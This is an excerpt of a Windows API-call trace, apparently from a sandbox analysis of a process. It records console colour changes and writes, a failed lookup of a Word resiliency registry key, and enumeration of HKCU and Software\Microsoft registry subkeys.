[0086.129] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x107, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.129] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0x7) returned 1
[0086.130] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x107, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.130] SetConsoleTextAttribute (hConsoleOutput=0x107, wAttributes=0x7) returned 1
[0086.131] WriteConsoleW (in: hConsoleOutput=0x107, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x107, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.131] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x10b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x10f, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.132] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x113, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.132] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0xc) returned 1
[0086.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x113, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.133] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0xc) returned 1
[0086.133] WriteConsoleW (in: hConsoleOutput=0x113, lpBuffer=0x3323528*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3323528*, lpNumberOfCharsWritten=0x1c81a110*=0x14) returned 1
[0086.134] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x113, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.134] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0x7) returned 1
[0086.134] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x113, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.135] SetConsoleTextAttribute (hConsoleOutput=0x113, wAttributes=0x7) returned 1
[0086.135] WriteConsoleW (in: hConsoleOutput=0x113, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x113, lpConsoleScreenBufferInfo=0x1c81a1e0 | out: lpConsoleScreenBufferInfo=0x1c81a1e0) returned 1
[0086.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x117, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x11b, lpConsoleScreenBufferInfo=0x1c81a090 | out: lpConsoleScreenBufferInfo=0x1c81a090) returned 1
[0086.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x11f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.137] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0xc) returned 1
[0086.137] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x11f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.138] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0xc) returned 1
[0086.138] WriteConsoleW (in: hConsoleOutput=0x11f, lpBuffer=0x3323a78*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a110, lpReserved=0x0 | out: lpBuffer=0x3323a78*, lpNumberOfCharsWritten=0x1c81a110*=0x1) returned 1
[0086.139] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x11f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.139] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0x7) returned 1
[0086.139] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x11f, lpConsoleScreenBufferInfo=0x1c81a060 | out: lpConsoleScreenBufferInfo=0x1c81a060) returned 1
[0086.139] SetConsoleTextAttribute (hConsoleOutput=0x11f, wAttributes=0x7) returned 1
[0086.140] WriteConsoleW (in: hConsoleOutput=0x11f, lpBuffer=0x2d2f608*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x1c81a1b0, lpReserved=0x0 | out: lpBuffer=0x2d2f608*, lpNumberOfCharsWritten=0x1c81a1b0*=0x1) returned 1
[0086.157] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x0) returned 0x2
[0086.157] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.157] CoTaskMemFree (pv=0x0)
[0086.157] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.157] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppEvents", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Console", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Control Panel", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Environment", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EUDC", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Identities", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Keyboard Layout", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Network", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.158] CoTaskMemFree (pv=0x2baf50)
[0086.158] CoTaskMemFree (pv=0x0)
[0086.158] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.158] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Printers", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x40c) returned 0x0
[0086.159] RegQueryInfoKeyW (in: hKey=0x40c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.159] CoTaskMemFree (pv=0x2baf50)
[0086.159] CoTaskMemFree (pv=0x0)
[0086.159] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.159] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.160] CoTaskMemFree (pv=0x0)
[0086.160] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.160] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.160] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x40c, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] RegOpenKeyExW (in: hKey=0x40c, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x410) returned 0x0
[0086.161] RegCloseKey (hKey=0x40c) returned 0x0
[0086.161] RegQueryInfoKeyW (in: hKey=0x410, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.161] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.161] CoTaskMemFree (pv=0x2baf50)
[0086.161] CoTaskMemFree (pv=0x0)
[0086.161] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.162] CoTaskMemFree (pv=0x2baf50)
[0086.162] CoTaskMemFree (pv=0x0)
[0086.162] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.162] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
[0086.163] CoTaskMemAlloc (cb=0x204) returned 0x2baf50
[0086.163] RegEnumKeyExW (in: hKey=0x410, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="GDIPlus", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.163] CoTaskMemFree (pv=0x2baf50)
[0086.163] CoTaskMemFree (pv=0x0)
